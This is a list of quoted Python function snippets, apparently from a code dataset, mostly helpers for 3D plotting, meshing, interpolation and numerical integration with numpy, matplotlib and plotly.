"def plot_3d(x, y):\n # Create grid coordinates\n x_axis = np.linspace(-10, 10, 50)\n y_axis = np.linspace(-1, 4, 50)\n xx, yy = np.meshgrid(x_axis, y_axis, indexing='xy')\n z = np.zeros((x_axis.size, y_axis.size))\n\n # Calculate z-values based on grid coefficients\n for (i, j), v in np.ndenumerate(z):\n z[i, j] = compute_cost(x, y, theta=[[xx[i, j]], [yy[i, j]]])\n\n # Construct plot\n fig = plt.figure(figsize=(12, 10))\n ax = fig.add_subplot(111, projection='3d')\n ax.plot_surface(xx, yy, z, rstride=1, cstride=1, alpha=0.6, cmap=plt.cm.jet)\n ax.set_zlabel('Cost')\n ax.set_zlim(z.min(), z.max())\n ax.view_init(elev=15, azim=230)\n plt.title('X vs. Y vs. Cost')\n ax.set_xlabel(r'$\\theta_0$', fontsize=17)\n ax.set_ylabel(r'$\\theta_1$', fontsize=17)\n plt.show()\n plt.close()",
"def makeCrossPlotX(f,g):\n x = zerofloat(n1,n2)\n y = zerofloat(n1,n2)\n class Loop(Parallel.LoopInt):\n def compute(self,i2):\n for i1 in range(1,n1-1):\n x[i2][i1] = 0.5*(f[i2][i1+1]-f[i2][i1-1])\n y[i2][i1] = g[i2][i1]-f[i2][i1]\n Parallel.loop(n2,Loop())\n return x,y",
"def plot_h_static_3d(n: int = 1):\n # todo: Major DRY\n E = -2 / (n + 1) ** 2\n x, ψ = h_static_3d(E)\n\n fig, ax = plt.subplots()\n ax.plot(x, ψ)\n\n ax.grid(True)\n plt.xlim(0, 20)\n plt.ylim(-0.02, 0.02)\n plt.show()",
"def plot3surface( pot, **kwargs ): \n \n fig = plt.figure( figsize = (8., 8.) ) \n gs = matplotlib.gridspec.GridSpec( 3,2, wspace=0.2) \n \n # Make a list with three perpendicular directions which \n # will define the three surface cuts \n perp = [(np.pi/2., 0.), (np.pi/2., -np.pi/2.), (0., -1.*np.pi/2.) ]\n \n # Iterate to plot the three surface cuts\n yMin = 1e16\n yMax = -1e16 \n Ims = []\n for i in range(3):\n ax0 = fig.add_subplot( gs[i,0], projection='3d')\n ax1 = fig.add_subplot( gs[i,1]) \n \n T0, T1, X, Y, Z = surfcut_points( normal = perp[i], \\\n ax0=ax0, **kwargs ) \n \n EVAL = pot.evalpotential(X,Y,Z)\n im = ax1.pcolormesh( T0, T1, EVAL, \\\n cmap=plt.get_cmap('jet') ) \n plt.axes( ax1 ) \n cbar = plt.colorbar(im)\n cbar.set_label( pot.unitlabel, rotation=0) \n \n ymin = EVAL.min()\n ymax = EVAL.max()\n \n Ims.append(im) \n if ymin < yMin : yMin = ymin\n if ymax > yMax : yMax = ymax \n \n for im in Ims:\n im.set_clim( vmin=yMin, vmax=yMax)",
"def f(x, y=0, z=0):\r\n return x ** 2 + y + z",
"def obfft3(x, y, z, f):\n dx = x[1] - x[0]\n dy = y[1] - y[0]\n dz = z[1] - z[0]\n Nx = x.size\n Ny = y.size\n Nz = z.size\n inull = Nx//2\n jnull = Ny//2\n knull = Nz//2\n Ff = dx * dy * dz * np.roll(np.roll(np.roll(np.fftn(f), inull-1, 0),\n jnull-1, 1), knull-1, 2)\n\n return Ff",
"def plot_3d(x_data, y_data, Z, df, xlabel, ylabel, xrange=None,\n yrange=None, figsize=(12, 12)):\n fig = pyplot.figure(figsize=figsize)\n ax = fig.add_subplot(111, projection='3d')\n nsamp, nsen = Z.shape\n\n sen_index = df.columns.names.index('sensor')\n senlist = df.columns.levels[sen_index]\n pyplot.yticks(y_data, senlist)\n ax.plot_surface(\n np.repeat(x_data,\n nsen, axis=1),\n np.repeat(np.matrix(y_data), nsamp, axis=0),\n df.values,\n cmap=cm.coolwarm)\n pyplot.xlabel(xlabel)\n pyplot.ylabel('Sensor name')\n ax.set_zlabel(ylabel)\n ax.view_init(elev=45., azim=-130)\n ax.tick_params(axis='y', which='major', labelsize=4)\n pyplot.show()",
"def plot_multidimensional_function_slices(\n func: Callable[[np.ndarray], NDAorTuple],\n slice_loc: np.ndarray,\n bounds: Union[np.ndarray, List[Tuple[float, float]]],\n input_names: Optional[List[str]] = None,\n obs_points: Optional[Union[np.ndarray, List[np.ndarray]]] = None,\n input_scales: Optional[List[PLOT_SCALE]] = None,\n output_scale: PLOT_SCALE = \"linear\",\n output_label: str = \"Objective Value\",\n size: float = 3,\n slice_2d_resolution: int = 50,\n # slide_1d_resolution: int = 100,\n func_returns_confidence_intervals: bool = False,\n) -> Tuple[plt.Figure, np.ndarray]:\n # Input validation checks\n assert output_scale in [\"linear\", \"log\", \"symlog\"]\n\n def func_return_just_mean(x):\n \"\"\"\n If the supplied function is a predictor returning lower and upper confidence bounds as well as mean,\n return just the mean prediction. If not, return the function value evaluated at x.\n \"\"\"\n return func(x)[0] if func_returns_confidence_intervals else func(x)\n\n n_dims: int = len(bounds)\n # If multiple batches of points supplied as a list in obs_points, make a colour palette\n n_batches = len(obs_points) if isinstance(obs_points, (list, tuple)) else 1\n scatter_colours = sns.color_palette(\"viridis\", n_colors=n_batches)\n # If input_scales not specified, default all to 'linear'\n input_scales = input_scales if input_scales else [\"linear\"] * n_dims # type: ignore # auto\n # Keep track of contour sets returned for each axis\n contour_sets = []\n\n # Construct axes\n fig = plt.figure(figsize=(size * n_dims, size * n_dims))\n axes, cbar_axes = make_lower_triangular_axis_grid_with_colorbar_axes(\n fig=fig, num_cols=n_dims, num_colorbars=2, share_y_on_diagonal=True\n )\n\n # Keep a running minimum and maximum of function values in 2D slices\n func_values_min: float = np.inf\n func_values_max: float = -np.inf\n\n with sns.axes_style(\"darkgrid\"):\n for i in range(n_dims): # i iterates over the rows of the plots\n for j in range(n_dims): # j iterates over the columns of the plots\n ax = axes[i, j]\n # 1D-slice plots along the diagonal\n if i == j:\n if func_returns_confidence_intervals:\n plot_1d_slice_through_function_with_confidence_intervals(\n func, # type: ignore\n dim=i,\n slice_loc=slice_loc,\n slice_bounds=bounds[i],\n ax=ax,\n x_scale=input_scales[i],\n )\n else:\n plot_1d_slice_through_function(\n func, # type: ignore\n dim=i,\n slice_loc=slice_loc,\n slice_bounds=bounds[i],\n ax=ax,\n x_scale=input_scales[i],\n )\n ax.set_yscale(output_scale)\n\n # lower triangle\n elif i > j:\n dim_x, dim_y = j, i\n # Compute the data for the 2D slice plots\n xx, yy, func_values_slice = calc_2d_slice(\n func=func_return_just_mean, # type: ignore # auto\n dim_x=dim_x,\n dim_y=dim_y,\n slice_loc=slice_loc,\n slice_bounds_x=bounds[dim_x],\n slice_bounds_y=bounds[dim_y],\n x_scale=input_scales[dim_x],\n y_scale=input_scales[dim_y],\n resolution=slice_2d_resolution,\n )\n # Plot the 2D slice\n _, im = plot_2d_slice_from_arrays(\n xx,\n yy,\n func_values_slice,\n ax=ax,\n x_scale=input_scales[dim_x],\n y_scale=input_scales[dim_y],\n output_scale=output_scale,\n )\n contour_sets.append(im)\n # Keep a running minimum and maximum of function values in slices\n func_values_min = min(func_values_min, func_values_slice.min()) # type: ignore\n func_values_max = max(func_values_max, func_values_slice.max()) # type: ignore\n # Scatter points on the slices if given\n if obs_points is not None: # pragma: no cover\n if isinstance(obs_points, np.ndarray):\n # If just one array given, scatter with the colour reflecting objective value\n ax.scatter(\n obs_points[:, dim_x], obs_points[:, dim_y], color=scatter_colours[0], s=20, zorder=15\n )\n else:\n assert isinstance(obs_points, (list, tuple))\n # If multiple arrays given, colour the points according to the batch number\n for batch_num, batch_arr in enumerate(obs_points):\n ax.scatter(\n batch_arr[:, dim_x],\n batch_arr[:, dim_y],\n color=scatter_colours[batch_num],\n s=25,\n lw=0.0,\n alpha=0.8,\n zorder=15,\n )\n # Add axis labels\n if input_names is not None: # pragma: no cover\n # If plot in the first column (but not first row), add a y_label\n if i != 0 and j == 0:\n axes[i, j].set_ylabel(input_names[i])\n # If plot is at the bottom, add an x_label\n if i == n_dims - 1:\n axes[i, j].set_xlabel(input_names[j])\n if i >= j:\n # Remove redundant ticks on inner plots\n if i != n_dims - 1:\n axes[i, j].xaxis.set_visible(False)\n if j != 0:\n axes[i, j].yaxis.set_visible(False)\n # # Prune the upper-most tick from plot, so that the ticks don't overlap each other between plots\n # ax.yaxis.set_major_locator(ticker.MaxNLocator(prune='upper'))\n ax.tick_params(axis=\"both\", which=\"major\", labelsize=9)\n ax.tick_params(axis=\"both\", which=\"minor\", labelsize=6)\n # Update the colour limits of the slice plots\n for contour_set in contour_sets:\n contour_set.set_clim(vmin=func_values_min, vmax=func_values_max)\n # Add the colourbars\n if n_dims > 1:\n # make a colourbar for the contour plots\n cb1 = fig.colorbar(contour_sets[-1], cax=cbar_axes[0], aspect=50)\n cb1.set_label(output_label)\n cbar_axes[0].yaxis.set_ticks_position(\"left\")\n # make a colourbar for different batches\n if n_batches > 1: # pragma: no cover\n cb2 = matplotlib.colorbar.ColorbarBase( # type: ignore # auto\n cbar_axes[1],\n cmap=matplotlib.colors.ListedColormap(scatter_colours),\n boundaries=[x - 0.5 for x in range(n_batches + 1)],\n ticks=list(range(n_batches)),\n spacing=\"proportional\",\n )\n cb2.set_label(\"Batch Number\")\n else:\n cbar_axes[1].set_visible(False)\n return fig, axes",
"def sample(self,f,N,p=100):\n return [f(x) for x in np.linspace(0,N,p)]",
"def transform3D(a, f):\n return f[0].dot(a) + f[1]",
"def plot3darray(vec, *args, **kwargs):\n vec = np.reshape(vec, (-1, 3))\n return plt.plot(vec[:, 0], vec[:, 1], vec[:, 2], *args, **kwargs)",
"def visual_callback_3d(fig=None, plot_each=1):\r\n\r\n from mpl_toolkits.mplot3d import Axes3D\r\n # PyMCubes package is required for `visual_callback_3d`\r\n try:\r\n import mcubes\r\n except ImportError:\r\n raise ImportError(\"PyMCubes is required for 3D `visual_callback_3d`\")\r\n\r\n # Prepare the visual environment.\r\n if fig is None:\r\n fig = plt.figure()\r\n fig.clf()\r\n ax = fig.add_subplot(111, projection='3d')\r\n plt.pause(0.001)\r\n\r\n counter = [-1]\r\n\r\n def callback(levelset):\r\n\r\n counter[0] += 1\r\n if (counter[0] % plot_each) != 0:\r\n return\r\n\r\n if ax.collections:\r\n del ax.collections[0]\r\n\r\n coords, triangles = mcubes.marching_cubes(levelset, 0.5)\r\n ax.plot_trisurf(coords[:, 0], coords[:, 1], coords[:, 2],\r\n triangles=triangles)\r\n plt.pause(0.1)\r\n\r\n return callback",
"def full_3d(self, quantity):\n # The data just tells you what integer grid point you are on. Not what actual x,y coordinate you\n # are at\n x = np.arange(0, self.period, self.dx)\n y = np.arange(0, self.period, self.dy)\n z = np.arange(0, self.height + self.dz, self.dz)\n points = np.array(list(itertools.product(z, x, y)))\n # Get the scalar\n scalar = self.get_scalar_quantity(quantity)\n labels = ('X [um]', 'Y [um]', 'Z [um]', quantity)\n # Now plot!\n self.scatter3d(points[:, 1], points[:, 2], points[\n :, 0], scalar.flatten(), labels, 'full_3d')",
"def plot3dproj(x, y, z, *args, color=(0,0,0), shadow_dist=1.0, color_proj=None, \n elev_azim=(39,-47), show_labels=False, **kwargs):\n\n if not color_proj:\n color_proj = lighter(color, .6)\n\n\n if np.isscalar(shadow_dist) == 1:\n sdist_x = shadow_dist\n sdist_y = shadow_dist\n sdist_z = shadow_dist\n else:\n sdist_x, sdist_y, sdist_z = shadow_dist\n\n fig = plt.figure(figsize=(7,7))\n ax = fig.add_subplot(111, projection= '3d')\n \n ax.plot(x, z, *args, zdir='y', zs=sdist_y*np.max(y), color=color_proj, **kwargs)\n ax.plot(y, z, *args, zdir='x', zs=sdist_x*np.min(x), color=color_proj, **kwargs)\n ax.plot(x, y, *args, zdir='z', zs=sdist_z*np.min(z), color=color_proj, **kwargs)\n ax.plot(x, y, z, *args, color=color, **kwargs)\n\n ax.view_init(elev=elev_azim[0], azim=elev_azim[1])\n ax.set_aspect('auto', adjustable='box') \n \n# ratio = 1.0\n# xvals, yvals = ax.get_xlim(), ax.get_ylim()\n# xrange = xvals[1]-xvals[0]\n# yrange = yvals[1]-yvals[0]\n# ax.set_aspect(ratio*(xrange/yrange), adjustable='box')\n fixed_aspect_ratio(1.0)\n\n if not show_labels:\n ax.set_xticklabels([]) \n ax.set_yticklabels([]) \n ax.set_zticklabels([])\n #plt.show()\n\n return ax",
"def extract3d(xaxis, yaxis, zaxis, dat3d, crd_sys, xvec,yvec, zvec, pad=0.):\n func = RegularGridInterpolator((xaxis, yaxis, zaxis), dat3d, \n method='linear', bounds_error=False, fill_value=pad)\n\n # convert x,y,z coordinates to spherical coordinates\n if crd_sys == 'car':\n profx = xvec\n profy = yvec\n profz = zvec\n elif crd_sys == 'sph':\n # radius\n profx = np.sqrt(xvec**2 + yvec**2 + zvec**2)\n\n # theta\n tvec = np.arctan2(zvec, np.sqrt(xvec**2 + yvec**2))\n reg = tvec < 0.\n tvec[reg] = tvec[reg] + 2.*np.pi\n profy = tvec\n\n # azimuth\n pvec = np.arctan2(yvec, xvec)\n reg = pvec < 0\n pvec[reg] = pvec[reg] + 2*np.pi\n profz = pvec\n\n nvec = len(xvec)\n prof = np.zeros([nvec], dtype=np.float64)\n for ii in range(nvec):\n prof[ii] = func([profx[ii], profy[ii], profz[ii]])\n\n return prof",
"def trisurf(\n x,\n y,\n z,\n simplices,\n show_colorbar,\n edges_color,\n scale,\n colormap=None,\n color_func=None,\n plot_edges=False,\n x_edge=None,\n y_edge=None,\n z_edge=None,\n facecolor=None,\n):\n # numpy import check\n if not np:\n raise ImportError(\"FigureFactory._trisurf() requires \" \"numpy imported.\")\n points3D = np.vstack((x, y, z)).T\n simplices = np.atleast_2d(simplices)\n\n # vertices of the surface triangles\n tri_vertices = points3D[simplices]\n\n # Define colors for the triangle faces\n if color_func is None:\n # mean values of z-coordinates of triangle vertices\n mean_dists = tri_vertices[:, :, 2].mean(-1)\n elif isinstance(color_func, (list, np.ndarray)):\n # Pre-computed list / array of values to map onto color\n if len(color_func) != len(simplices):\n raise ValueError(\n \"If color_func is a list/array, it must \"\n \"be the same length as simplices.\"\n )\n\n # convert all colors in color_func to rgb\n for index in range(len(color_func)):\n if isinstance(color_func[index], str):\n if \"#\" in color_func[index]:\n foo = clrs.hex_to_rgb(color_func[index])\n color_func[index] = clrs.label_rgb(foo)\n\n if isinstance(color_func[index], tuple):\n foo = clrs.convert_to_RGB_255(color_func[index])\n color_func[index] = clrs.label_rgb(foo)\n\n mean_dists = np.asarray(color_func)\n else:\n # apply user inputted function to calculate\n # custom coloring for triangle vertices\n mean_dists = []\n for triangle in tri_vertices:\n dists = []\n for vertex in triangle:\n dist = color_func(vertex[0], vertex[1], vertex[2])\n dists.append(dist)\n mean_dists.append(np.mean(dists))\n mean_dists = np.asarray(mean_dists)\n\n # Check if facecolors are already strings and can be skipped\n if isinstance(mean_dists[0], str):\n facecolor = mean_dists\n else:\n min_mean_dists = np.min(mean_dists)\n max_mean_dists = np.max(mean_dists)\n\n if facecolor is None:\n facecolor = []\n for index in range(len(mean_dists)):\n color = map_face2color(\n mean_dists[index], colormap, scale, min_mean_dists, max_mean_dists\n )\n facecolor.append(color)\n\n # Make sure facecolor is a list so output is consistent across Pythons\n facecolor = np.asarray(facecolor)\n ii, jj, kk = simplices.T\n\n triangles = graph_objs.Mesh3d(\n x=x, y=y, z=z, facecolor=facecolor, i=ii, j=jj, k=kk, name=\"\"\n )\n\n mean_dists_are_numbers = not isinstance(mean_dists[0], str)\n\n if mean_dists_are_numbers and show_colorbar is True:\n # make a colorscale from the colors\n colorscale = clrs.make_colorscale(colormap, scale)\n colorscale = clrs.convert_colorscale_to_rgb(colorscale)\n\n colorbar = graph_objs.Scatter3d(\n x=x[:1],\n y=y[:1],\n z=z[:1],\n mode=\"markers\",\n marker=dict(\n size=0.1,\n color=[min_mean_dists, max_mean_dists],\n colorscale=colorscale,\n showscale=True,\n ),\n hoverinfo=\"none\",\n showlegend=False,\n )\n\n # the triangle sides are not plotted\n if plot_edges is False:\n if mean_dists_are_numbers and show_colorbar is True:\n return [triangles, colorbar]\n else:\n return [triangles]\n\n # define the lists x_edge, y_edge and z_edge, of x, y, resp z\n # coordinates of edge end points for each triangle\n # None separates data corresponding to two consecutive triangles\n is_none = [ii is None for ii in [x_edge, y_edge, z_edge]]\n if any(is_none):\n if not all(is_none):\n raise ValueError(\n \"If any (x_edge, y_edge, z_edge) is None, \" \"all must be None\"\n )\n else:\n x_edge = []\n y_edge = []\n z_edge = []\n\n # Pull indices we care about, then add a None column to separate tris\n ixs_triangles = [0, 1, 2, 0]\n pull_edges = tri_vertices[:, ixs_triangles, :]\n x_edge_pull = np.hstack(\n [pull_edges[:, :, 0], np.tile(None, [pull_edges.shape[0], 1])]\n )\n y_edge_pull = np.hstack(\n [pull_edges[:, :, 1], np.tile(None, [pull_edges.shape[0], 1])]\n )\n z_edge_pull = np.hstack(\n [pull_edges[:, :, 2], np.tile(None, [pull_edges.shape[0], 1])]\n )\n\n # Now unravel the edges into a 1-d vector for plotting\n x_edge = np.hstack([x_edge, x_edge_pull.reshape([1, -1])[0]])\n y_edge = np.hstack([y_edge, y_edge_pull.reshape([1, -1])[0]])\n z_edge = np.hstack([z_edge, z_edge_pull.reshape([1, -1])[0]])\n\n if not (len(x_edge) == len(y_edge) == len(z_edge)):\n raise exceptions.PlotlyError(\n \"The lengths of x_edge, y_edge and \" \"z_edge are not the same.\"\n )\n\n # define the lines for plotting\n lines = graph_objs.Scatter3d(\n x=x_edge,\n y=y_edge,\n z=z_edge,\n mode=\"lines\",\n line=graph_objs.scatter3d.Line(color=edges_color, width=1.5),\n showlegend=False,\n )\n\n if mean_dists_are_numbers and show_colorbar is True:\n return [triangles, lines, colorbar]\n else:\n return [triangles, lines]",
"def funcify_3d(arrayin, func2d):\r\n assert(len(arrayin.shape) >= 2)\r\n elem = arrayin.size / (arrayin.shape[-1] * arrayin.shape[-2])\r\n if elem == 2 :\r\n arrayout = func2d(arrayin)\r\n else :\r\n array = arrayin.flatten().reshape( (elem, arrayin.shape[-2], arrayin.shape[-1]))\r\n arrayout = []\r\n for i in range(elem):\r\n arrayout.append(func2d(array[i]))\r\n arrayout = np.array(arrayout).reshape( arrayin.shape )\r\n return arrayout",
"def integrate_3D(x, y, z, xlim, ylim, zlim, csd, xlin, ylin, zlin, X, Y, Z):\n Nz = zlin.shape[0]\n Ny = ylin.shape[0]\n m = np.sqrt((x - X)**2 + (y - Y)**2 + (z - Z)**2)\n m[m < 0.0000001] = 0.0000001\n z = csd / m\n Iy = np.zeros(Ny)\n for j in xrange(Ny):\n Iz = np.zeros(Nz) \n for i in xrange(Nz):\n Iz[i] = simps(z[:,j,i], zlin)\n Iy[j] = simps(Iz, ylin)\n F = simps(Iy, xlin)\n return F",
"def step_3(f: Callable[..., float], x: float, y: np.array, params: Tuple,\\\n h: float, k2: np.array) -> np.array:\n\n # Initialize the output vector.\n n = len(y)\n y_int = np.zeros(n)\n\n # Find dym/dx using the given function, then use it to compute dym-1/dx.\n y_int[0] = f(x + (h / 2), y + (k2 / 2), *params) * h\n\n # Starting with dym-1/dx, compute the other values down to y/dx.\n for i in range(1, n):\n y_int[i] = (y[n-i] + (k2[n-i] / 2)) * h\n\n # Reverse the output vector so y/dx is on top.\n y_int = np.flipud(y_int)\n\n return y_int",
"def eval_2d_mesh(xmin, ymin, xmax, ymax, nx, ny, eval_fun):\n if xmin > xmax:\n raise ValueError(\"xmin (%.2f) was greater than\"\n \"xmax (%.2f)\" % (xmin, xmax))\n if ymin > ymax:\n raise ValueError(\"ymin (%.2f) was greater than\"\n \"ymax (%.2f)\" % (xmin, xmax))\n if nx < 1 or ny < 1:\n raise ValueError(\"nx (%.2f) or ny (%.2f) was less than 1\" % (nx, ny))\n X = np.linspace(xmin, xmax, nx)\n lenx = len(X)\n Y = np.linspace(ymin, ymax, ny)\n leny = len(Y)\n X, Y = np.meshgrid(X, Y)\n Z = np.zeros((leny, lenx))\n for i in range(leny):\n for j in range(lenx):\n Z[i][j] = eval_fun(np.array([X[i][j], Y[i][j]]))\n return (X, Y, Z)",
"def f(x):\n n_particles = x.shape[0]\n j = [f_per_particle(x[i]) for i in range(n_particles)]\n #print(\"f j: \", j)\n return np.array(j)",
"def mesh_slice(V,n,X,Y,Z):\n from matplotlib import cm\n import mpl_toolkits.mplot3d.axes3d as p3\n import time\n order=np.array([(1,2,0),(2,0,1),(0,1,2)])\n q=np.transpose(V,(order[n])) # See projection for why we could also use take instead.\n if n==0: # Make a less cumbersome and more consistent version of this?\n i,j=X,Y\n i,j=np.array([i]),np.array([j]).T\n I,J=i,j\n for m in range(j.shape[0]-1): # -1 because we already have the first row as I.\n I=np.vstack((I,i))\n for m in range(i.shape[1]-1):\n J=np.hstack((J,j))\n if n==1:\n i,j=Y,Z\n i,j=np.array([i]),np.array([j]).T\n I,J=i,j\n for m in range(j.shape[0]-1): # -1 because we already have the first row as I.\n I=np.vstack((I,i))\n for m in range(i.shape[1]-1):\n J=np.hstack((J,j))\n if n==2:\n i,j=Z,X\n i,j=np.array([i]),np.array([j]).T\n I,J=i,j\n for m in range(j.shape[0]-1): # -1 because we already have the first row as I.\n I=np.vstack((I,i))\n for m in range(i.shape[1]-1):\n J=np.hstack((J,j))\n labels={\n 0:('horizontal axial (mm)','height (mm)'),\n 1:('horizontal radial (mm)','horizontal axial (mm)'),\n 2:('height (mm)','horizontal radial (mm)')\n } \n class animated(object): # 4D, plots f(x,y,z0) specific to mesh_slice.\n def __init__(self,I,J,q):\n self.fig = plt.figure()\n self.ax = self.fig.add_subplot(111, projection='3d')\n self.I,self.J=I,J\n self.q=q[:,0,:]\n self.surf=self.ax.plot_surface(self.J,self.I,self.q,cmap=cm.coolwarm,antialiased=False)\n def drawNow(self,ii,q,n):\n self.surf.remove()\n self.slc=q[:,ii,:]\n self.surf=self.ax.plot_surface(self.J,self.I,self.slc,cmap=cm.coolwarm,antialiased=False)\n plt.ylabel(labels[n][1])\n plt.xlabel(labels[n][0])\n #plt.title(ii) #Optional: this moves down during animation.\n plt.draw() # redraw the canvas\n time.sleep(0.01)\n self.fig.show()\n anim=animated(I,J,q)\n for ii in range(q.shape[1]):\n if ii==q.shape[1]-1:\n plt.title('Animation complete.')\n anim.drawNow(ii,q,n)\n return plt.show()",
"def f(x, y, z, a = 10, b = 20, c = 30):\r\n \r\n return((x + y + z) * (a + b + c))",
"def plot_dist_3p(\n hst,\n xi,\n yi,\n ax=None,\n filled=False,\n fcolors=None,\n **kwargs,\n ):\n vl = [0.3, 0.6, 0.9]\n fig = plot_dist_xp(hst, xi, yi, ax=ax, levels=vl, filled=filled, fcolors=fcolors, **kwargs)\n return fig",
"def box3(x, sigma, output, mode='wrap'):\n n = int(round(2.893638 * sigma - 1.520667))\n a, b, c = 1 + 2 * (n / 3), 1 + 2 * ((n + 1) / 3), 1 + 2 * ((n + 2) / 3)\n nd.uniform_filter(x, a, mode=mode, output=output)\n nd.uniform_filter(output, b, mode=mode, output=output)\n nd.uniform_filter(output, c, mode=mode, output=output)",
"def f(x, alpha=0.80):\n n_particles = x.shape[0]\n #print('n_particles=' + str(n_particles))\n #print('x=' + str(x.shape))\n #print(x[0])\n j = [f_per_particle(x[i], alpha) for i in range(n_particles)]\n #print(j)\n return np.array(j)",
"def plot_3D(Y_data, num_area):\n ref_shape = [Y_data.shape[0], Y_data.shape[1], Y_data.shape[2]]\n fig = plt.figure()\n ax = plt.axes(projection=\"3d\")\n axl = plt.gca()\n axl.set_xlim3d([0, ref_shape[0]])\n axl.set_ylim3d([0, ref_shape[1]])\n axl.set_zlim3d([0, ref_shape[2]])\n\n fig.set_facecolor('black')\n ax.set_facecolor('black')\n ax.grid(False)\n ax.w_xaxis.pane.fill = False\n ax.w_yaxis.pane.fill = False\n ax.w_zaxis.pane.fill = False\n\n ax.set_xlabel('Width', c='white')\n ax.set_ylabel('Depth', c='white')\n ax.set_zlabel('Height', c='white')\n\n for a in np.arange(1, num_area+1):\n loc = np.where(Y_data == a)\n ax.scatter3D(loc[0], loc[1], loc[2], marker=\".\", alpha=0.9)\n\n plt.show()",
"def plot3d(data, label, feature0, feature1, feature2):\n female = []\n male = []\n for i in range(0, 4000):\n if label[i] == 0:\n female.append([data[i, 0], data[i, 1], data[i, 2]])\n elif label[i] == 1:\n male.append([data[i, 0], data[i, 1], data[i, 2]])\n\n fig = plt.figure(figsize=(8, 8))\n ax = fig.add_subplot(111, projection='3d')\n plt.rcParams['legend.fontsize'] = 10\n ax.plot([row[feature0] for row in female], [row[feature1] for row in female], [row[feature2] for row in female],\n 'o', markersize=8, color='red',\n alpha=0.5, label='Female')\n ax.plot([row[feature0] for row in male], [row[feature1] for row in male], [row[feature2] for row in male], '+',\n markersize=8, alpha=0.5,\n color='blue', label='Male')\n plt.title('4000 Samples for Female and Male')\n ax.legend(loc='upper right')\n plt.show()",
"def visualize_in_3d(self,**kwargs):\n fig = plt.figure(figsize=(7,7))\n ax = fig.add_subplot(111, projection='3d')\n\n points = np.vstack([\n c.to_matrix() for c in self.contours if c.inclusion\n ])\n points[:,:2] = points[:,:2] * self.scan.pixel_spacing\n\n # Center the points at the origin for \n # spherical coordinates conversion.\n points = points - points.mean(axis=0)\n\n # Triangulate the azimuth and zenith transformation.\n azimuth = np.arctan2(points[:,1],points[:,0])\n zenith = np.arccos(points[:,2] / np.linalg.norm(points,axis=1))\n azi_zen = np.c_[azimuth.flatten(),zenith.flatten()]\n triangles = Delaunay(azi_zen).simplices\n\n # Start the points at 0 on every axis.\n # This lets the axis ticks to be interpreted as length in mm.\n points = points - points.min(axis=0)\n\n ax.set_xlabel('length (mm)')\n ax.set_ylabel('length (mm)')\n ax.set_zlabel('length (mm)')\n\n # Plot the points.\n ax.plot_trisurf(points[:,0], points[:,1], points[:,2],\n triangles=triangles, **kwargs)\n plt.show()",
"def plot3d2(x, y, z, z2, save_fig = True, title = None):\n\n fig = plt.figure(figsize = (12, 7))\n ax = fig.add_subplot(121, projection = '3d')\n try:\n ax.title.set_text(title)\n except:\n pass\n\n surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\n ax.set_zlim(-0.10, 1.40)\n ax.zaxis.set_major_locator(LinearLocator(10))\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\n ax.view_init(elev=20., azim=30)\n\n ax = fig.add_subplot(122, projection = '3d')\n\n ax.title.set_text('FrankeFunction')\n\n ax.plot_surface(x, y, z2,\n linewidth=0, antialiased=False)\n ax.set_zlim(-0.10, 1.40)\n ax.zaxis.set_major_locator(LinearLocator(10))\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\n # Customize the z axis.\n ax.set_zlim(-0.10, 1.40)\n ax.zaxis.set_major_locator(LinearLocator(10))\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\n ax.view_init(elev=20., azim=30)\n\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5)\n try:\n fig.savefig(results_dir + save_fig)\n except:\n pass\n plt.show()",
"def profileXY(xdata, ydata, zdata, nbinsx, nbinsy,\n xrange=None, yrange=None, zrange=None, drop_nan=True):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n zmin, zmax = (np.min(zdata), np.max(zdata)) if zrange is None else zrange\n\n x_out = np.linspace(xmin, xmax, nbinsx+1)\n y_out = np.linspace(ymin, ymax, nbinsy+1)\n z_out = np.empty((nbinsx, nbinsy))\n z_err = np.empty((nbinsx, nbinsy))\n dx = np.diff(x_out)[0]\n dy = np.diff(y_out)[0]\n\n selection = (in_range(xdata, xmin, xmax) &\n in_range(ydata, ymin, ymax) &\n in_range(zdata, zmin, zmax))\n xdata, ydata, zdata = xdata[selection], ydata[selection], zdata[selection]\n for i in range(nbinsx):\n for j in range(nbinsy):\n selection = (in_range(xdata, x_out[i], x_out[i+1]) &\n in_range(ydata, y_out[j], y_out[j+1]))\n bin_data = np.extract(selection, zdata)\n z_out[i,j] = np.nanmean(bin_data) if bin_data.size else 0.\n z_err[i,j] = np.nanstd(bin_data) / bin_data.size**0.5 if bin_data.size else 0.\n x_out += dx / 2.\n y_out += dy / 2.\n x_out = x_out[:-1]\n y_out = y_out[:-1]\n if drop_nan:\n selection = (np.isnan(z_out) | np.isnan(z_err))\n z_out[selection] = 0\n z_err[selection] = 0\n return x_out, y_out, z_out, z_err",
"def function_to_surface (x, y, func, hist=False):\n dx = x[1] - x[0]\n dy = y[1] - y[0]\n xbins = np.r_[x - dx/2., x[-1] + dx/2.]\n ybins = np.r_[y - dy/2., y[-1] + dy/2.]\n values = np.vectorize (func) (*np.meshgrid (x, y)).T\n if hist:\n return Hist2D (xbins, ybins, values)\n else:\n return Surface2D (xbins, ybins, values)",
"def Generate_Custom(f, n, m):\n return np.fromfunction(np.vectorize(f, otypes=[float]), (n,m))",
"def x_mesh(N,interval):\n (a,b) = interval\n h = (b-a)/N\n xmesh1=[a]\n for i in range(1,N):\n xmesh1.append(a+i*h)\n xmesh1.append(b)\n xmesh2=xmesh1[1:N]\n \n return xmesh1,xmesh2",
